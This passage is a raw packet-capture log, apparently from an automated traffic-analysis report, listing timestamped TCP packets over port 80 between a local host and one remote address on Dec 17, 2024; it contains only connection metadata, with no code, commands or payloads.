                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.896481991 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.896533012 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.896536112 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.896574974 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.897370100 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.897429943 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.897445917 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.897485971 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.898212910 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.898258924 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.898296118 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.898334980 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.899183035 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.899230957 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.899374008 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.899431944 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.899990082 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.900044918 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.900052071 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.900150061 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.900856972 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.900902987 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.900930882 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.900973082 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.901724100 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.901787996 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.901839018 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.901878119 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.902627945 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.902695894 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.902755022 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.902798891 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.903512001 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.903564930 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.903601885 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.903644085 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.904417038 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.904469967 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.904531956 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.904586077 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.905298948 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.905345917 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.905376911 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.905427933 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.906236887 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.906299114 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.906337976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.906382084 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.907090902 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.907138109 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.907195091 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.907238960 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.907999992 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.908045053 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.908118963 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.908118963 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.908840895 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.908891916 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.908950090 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.909004927 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.909761906 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.909815073 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.909857988 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.909905910 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.910609007 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.910669088 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.910727978 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.910768032 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.911541939 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.911597013 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.911632061 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.911672115 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.912503004 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.912523985 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.912568092 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.912581921 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.913296938 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.913352966 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.913429976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.913475037 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.914165974 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.914220095 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.914308071 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.914352894 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.915052891 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.915097952 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.915115118 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.915158987 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.915978909 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.916027069 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.916055918 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.916094065 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.916857004 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.916898012 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.916990042 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.917037964 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.917706966 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.917754889 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.917824030 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.917889118 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.918683052 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.918735981 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.918771982 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.918812990 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.919512033 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.919569016 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.919589996 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.919631958 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.920377016 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.920438051 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.920471907 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.920515060 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.921252966 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.921309948 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.921444893 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.921493053 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.922137976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.922192097 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.922199011 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.922239065 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.923027992 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.923085928 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.923155069 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.923197985 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.923924923 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.923976898 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.924015999 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.924057007 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.924880981 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.924935102 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.925451994 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.925503016 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.925674915 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.925692081 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.925718069 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.925741911 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.926645994 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.926701069 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.926800966 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.926848888 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.927634954 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.927685022 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.927756071 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.927800894 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.928416967 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.928467989 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.928607941 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.928656101 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.929266930 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.929320097 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.929502010 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.929552078 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.930197954 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.930244923 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.930277109 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.930321932 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.931103945 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.931157112 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.931186914 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.931229115 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.931956053 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.932005882 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.932145119 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.932198048 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.932840109 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.932889938 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.932955027 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.932996988 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.933726072 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.933773994 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.933808088 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.933856964 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.934613943 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.934664011 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.934694052 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.934734106 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.935487032 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.935538054 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.935570955 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.935615063 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023360014 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023412943 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023529053 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023766041 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023797989 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023808956 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023833036 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023870945 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.024780989 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.024867058 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.024867058 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.024915934 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.025516987 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.025594950 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084377050 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084433079 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084495068 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084775925 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084808111 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084821939 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084836006 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084873915 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.085762024 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.085793018 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.085813046 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.085824966 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.086635113 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.086699963 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.086777925 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.086822987 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.087425947 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.087469101 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.087604046 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.087647915 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.088330030 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.088375092 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.088561058 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.088610888 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.089216948 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.089262962 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.089436054 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.089478970 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.090485096 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.090533972 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.090595007 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.090636015 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.091624022 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.091670036 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.091672897 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.091707945 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.092336893 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.092384100 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.092437029 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.092472076 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.093194962 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.093242884 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.093324900 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.093368053 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.094487906 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.094521046 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.094537020 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.094561100 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.095325947 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.095377922 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.095438957 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.095482111 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.096226931 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.096271038 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.096354961 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.096393108 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.097345114 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.097400904 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.097421885 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.097460985 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.098319054 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.098368883 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.098407030 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.098443985 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.099276066 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.099318027 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.099323034 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.099354029 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.100368977 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.100426912 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.100523949 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.100567102 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.101152897 CET8049738138.124.60.133192.168.2.4
